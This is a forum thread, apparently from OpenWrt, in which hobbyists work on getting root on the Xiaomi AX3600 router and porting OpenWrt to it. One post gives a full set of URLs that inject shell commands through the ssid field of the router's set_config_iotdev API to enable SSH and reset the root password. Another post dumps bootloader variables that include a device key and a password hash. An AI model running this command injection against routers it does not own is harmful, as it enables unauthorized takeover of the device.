Adding OpenWrt support for Xiaomi AX3600

No need for that, QSDK and all the drivers are open source.
FW for WCSS, WLAN and NSS are blobs rest if open source code.

2 Likes

There are a lot of sellers who offer it for ~110 USD with free shipping, search for "AX3600" on aliexpress.

I already bought it for 98EUR last week

3 Likes

Hey Everyone!
I'm very very interested in this one since I have a WRT3200ACM and it is the most annoying device ever (with it's buggy wireless drivers) and I'm thinking of replacing it with the AX3600 but there are some doubts I need to clarify before making that decision.

  1. If someone with this router could confirm this for me it would be great, I have seen in a website (this one: http://www.bitswrt.com/11AX.html) that the 5ghz wireless can do 4x4 in 80mhz but when 160mhz is selected it drops to 2x2, is it true? could you test this for me?
  2. I believe that the QSDK opensource wireless drivers you mention (at least for now) don't support the IPQ8071A, only the IPQ8074 SoC
  3. I have found that the TP-Link Deco X60 is a device with very similar hardware, and TP-Link released the GPL source which can be useful to add openwrt support to AX3600
1 Like

I bought it today. It seems very powerful device. I hope we can start "modding" it soon.

Thank you so much for everyone's brilliant work. Just got mine today, and managed to get into ssh. Had a bit of trouble with some of the instruction above, so thought I'd lay it all out in one post to make it easy for everyone:

First some notes:

  • You must download firmware 1.0.17 from here and downgrade your router to it (mine came with 1.0.20 installed).
  • To install the firmware you will have to get past the first boot wizard. Use Chrome and the Google Translate extension to interpret everything. You don;t need it plugged into the internet, just pluggin one of the LAN (not WAN) ports into your computer should be sufficient.
  • <PASSWORD> is the password you want to use to log into the with, remember to replace this with a value
  • The password must be 8+ characters long, and can't contain the words admin or password (eg admin123 won't work). This is because passwd thinks they are too weak.
  • <STOK> replace this with the alphanumeric code that comes up in the address bar after 'stok=' once you've logged in to the router. Note this changed with each log in.
  • The sed above I couldn't get to work for some reason, so I simplified them a bit to (DO NOT USE IT YET, IT NEEDS ENCODING):
sed -i '/flg_ssh.*release/ { :a; N; /fi/! ba };/return 0/d' /etc/init.d/dropbear
  • I used the url encoder here to create all the commands
  • The values for bssid= and user_id= can be anything, due to using the -h as the first command, the command lua wants to run never gets executed

Copy these following urls into notepad or something, and use find and replace to replace <STOK> with the value from your address bar (one of mine was 57784feec2264522e77a5624c5af16e8 to give you an idea on what they look like (remember they change on every login to the router), and replace <PASSWORD> with the password you want to use (this does not need to be the one you gave the router during setup). The command the urls' represent are in BOLD:

nvram set ssh_en=1
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Anvram%20set%20ssh%5Fen%3D1%0A

nvram commit
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Anvram%20commit%0A

cp /etc/init.d/dropbear /etc/init.d/dropbear_backup
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Acp%20%2Fetc%2Finit.d%2Fdropbear%20%2Fetc%2Finit.d%2Fdropbear_backup%0A

sed -i '/flg_ssh.*release/ { :a; N; /fi/! ba };/return 0/d' /etc/init.d/dropbear
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Ased%20-i%20'%2Fflg_ssh.*release%2F%20%7B%20%3Aa%3B%20N%3B%20%2Ffi%2F!%20ba%20%7D%3B%2Freturn%200%2Fd'%20%2Fetc%2Finit.d%2Fdropbear%0A

echo -e "<PASSWORD>/n<PASSWORD>" | passwd root
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27<PASSWORD>%5Cn<PASSWORD>%27%20%7C%20passwd%20root%0A

/etc/init.d/dropbear enable
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0A%2Fetc%2Finit.d%2Fdropbear%20enable%0A

/etc/init.d/dropbear start
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=doctor&user_id=doctor&ssid=-h%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A

Now you should be able to login using ssh root@192.168.31.1 on linux, or using putty on windows.

Hope this all help someone.
Alex

9 Likes

LED and QCA-WIFI 160MHz (script) has problem
very thank zhiping

2 Likes

Just for people wanting to install stuff to the router, there isn't much rw space (most things mounted read/write have access to ~ 20.8 MB in total of shared space). But luckily the ever reliable /tmp is naturally read/write, but will not persist across reboots. You could download the files to your PC and use scp to upload them to the router, or just wget files directly to /tmp if your router is connected to the internet. Luckily /etc/opkg.conf already defines /tmp as an installation destination (named ram). The packages to install and their dependencies can be downloaded from https://downloads.openwrt.org/snapshots/packages/aarch64_cortex-a53/ or compiled yourself (using the Qualcomm Atheros IPQ807x target). If it uses a linked library that requires a specific version, the version of OpenWRT installed on the router is 18.06-snapshot, so you may be lucky downloading the package and it's dependencies from https://downloads.openwrt.org/releases/18.06.8/packages/aarch64_cortex-a53/. Although I've not tested kernel modules. For instance to install nano i did:
On PC (as AX3600 is not connected to internet)

wget https://downloads.openwrt.org/snapshots/packages/aarch64_cortex-a53/base/libncurses6_6.2-1_aarch64_cortex-a53.ipk
scp libncurses6_6.2-1_aarch64_cortex-a53.ipk root@192.168.31.1:/tmp/
wget https://downloads.openwrt.org/snapshots/packages/aarch64_cortex-a53/packages/nano_4.9.3-1_aarch64_cortex-a53.ipk
scp nano_4.9.3-1_aarch64_cortex-a53.ipk root@192.168.31.1:/tmp/
ssh root@192.168.31.1

On AX3600

opkg install --dest ram /tmp/libncurses6_6.2-1_aarch64_cortex-a53.ipk 
rm /tmp/libncurses6_6.2-1_aarch64_cortex-a53.ipk 
opkg install --dest ram /tmp/nano_4.9.3-1_aarch64_cortex-a53.ipk
rm /tmp/nano_4.9.3-1_aarch64_cortex-a53.ipk

then just type:
TERM=xterm-256 /tmp/usr/bin/nano <name of file>
to execute

If your router is connected to the internet, you can just edit /etc/opkg/distfeeds.conf and change all ocurrances of -SNAPSHOT with .8. Do an opkg update, and install using the --dest ram option above (so no need to download the package first, or delete it after, although I would delete opkg cache).

Hope this helps.

2 Likes

Sorry, I'll digress a bit. Thinking about ordering AX3600 and using it as dumb AP until at least snapshot image of OpenWrt is available. Is anyone doing the same? How easy is it to configure WiFi SSIDs without fluency in Chinese?

PS. Kudos to @ajw107 providing the list of encoded commands. I was thinking of hosting a shell script to do all of that and feeding it to ash on the router. If anyone wants to test it, let me know.

I'm looking to test out this unit as my primary router but I want to make sure to sinkhole all the phone home links. So far I've identified the below hostnames and changed the hostnames in uci to an invalid hostname to prevent all the cross-site URL's Xiaomi appears to be using to phone home activity just by browsing the admin site. Any additional thoughts here besides just using /etc/hosts (besides using a FW or Pihole - my Pi is off in a K8s cluster right now).

root@XiaoQiang:~# cat /etc/hosts
127.0.0.1 localhost

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

0.0.0.0 baidu.com taobao.com xiaomi.cn xiaomi.com
0.0.0.0 www.baidu.com www.taobao.com www.xiaomi.cn www.xiaomi.com
::1     baidu.com taobao.com xiaomi.cn xiaomi.com
::1     www.baidu.com www.taobao.com www.xiaomi.cn www.xiaomi.com
0.0.0.0 miwifi.com log.miwifi.com s.miwifi.com app.miwifi.com stun.miwifi.com broker.miwifi.com
::1     miwifi.com log.miwifi.com s.miwifi.com app.miwifi.com stun.miwifi.com broker.miwifi.com
0.0.0.0 bbs.xiaomi.cn bbs.xiaomi.com
::1     bbs.xiaomi.cn bbs.xiaomi.com
3 Likes

Hello everyone, does anyone know how to add support for vlan2 and ieee 802.1q protocol via ssh on mi openwrt firmware (1.0.17) of our ax3600? thank you I'm waiting for someone more capable than me.

FYI @efsg just posted on how to load the OpenWRT QSDK on the AX3600 over here: Xiaomi AX3600 install guide

1 Like

Would be more interesting how to build this for the AX3600 because i wouldn't trust this prebuilt image.

1 Like

Is there any device configuration yet to start building for this ?, I should have mine next week (will be unused for a while) as it will eventually replace my WRT3200ACM.

I would love to help out getting this thing building now we have access to flash images. Also it looks like the NSS driver for the other IPQ devices seems to be progressing.

1 Like

Build from qsdk11
QCA-WIFI NSS works

1 Like

does the @efsg g guide also add support for 802.1q and vlan2 835?

I have a few questions on the specifics

  • What QSDK tag is used here ?
  • What (if any files) needed to be extracted from the original OS (QCA firmware ect)
  • What modifications where needed to the QSDK 807X target DTS and board configs ?

anyone find the bootstrap resistors to force SPI as boot media instead?

Hi every one, im flowing enable SSH TUT by @LonGDikE and was success! but now i want to install another libs but fail because "root /" was locked. any one know to unlock it pls help.
im tried

mtd unlock ubi_rootfs and mount -o rw / but nothing effect.

I now have serial access to mine shell & uboot

IPQ807x# printenv
CountryCode=CN
Router_unconfigured=0
SN=266##/E0P51####
boot_wait=on
bootcmd=bootmiwifi
bootdelay=5
color=101
eth1addr=8c:53:c3:b2:8a:2e
eth2addr=8c:53:c3:d6:db:3a
eth3addr=8c:53:c3:d6:db:3a
eth4addr=8c:53:c3:d6:db:3a
ethact=eth0
ethaddr=8c:53:c3:d6:db:3a
fdt_high=0x4A400000
fdtcontroladdr=4a979e10
flag_boot_rootfs=0
flag_boot_success=1
flag_boot_type=2
flag_last_success=0
flag_ota_reboot=0
flag_try_sys1_failed=0
flag_try_sys2_failed=0
flash_type=2
ipaddr=192.168.31.1
machid=8010010
miot_did=331152123
miot_key=Znnp0KAIRNGCWGce
mode=Router
model=R3600
no_wifi_dev_times=0
nv_sys_pwd=7428394ddb9de74cb1cc8197f570e4838b278300
nv_wan_type=dhcp
nv_wifi_enc=mixed-psk
nv_wifi_enc1=mixed-psk
nv_wifi_pwd=test
nv_wifi_pwd1=test
nv_wifi_ssid=Xiaomi_8A2E
nv_wifi_ssid1=Xiaomi_8A2E_5G
restore_defaults=0
serverip=192.168.31.100
soc_version_major=2
soc_version_minor=0
ssh_en=1
stderr=serial@78B3000
stdin=serial@78B3000
stdout=serial@78B3000
telnet_en=0
uart_en=1
wl0_radio=1
wl0_ssid=Xiaomi_8A2E_75D1_5G
wl1_radio=1
wl1_ssid=Xiaomi_8A2E_75D1
wl2_ssid=Xiaomi_8A2E

Environment size: 1174/65532 bytes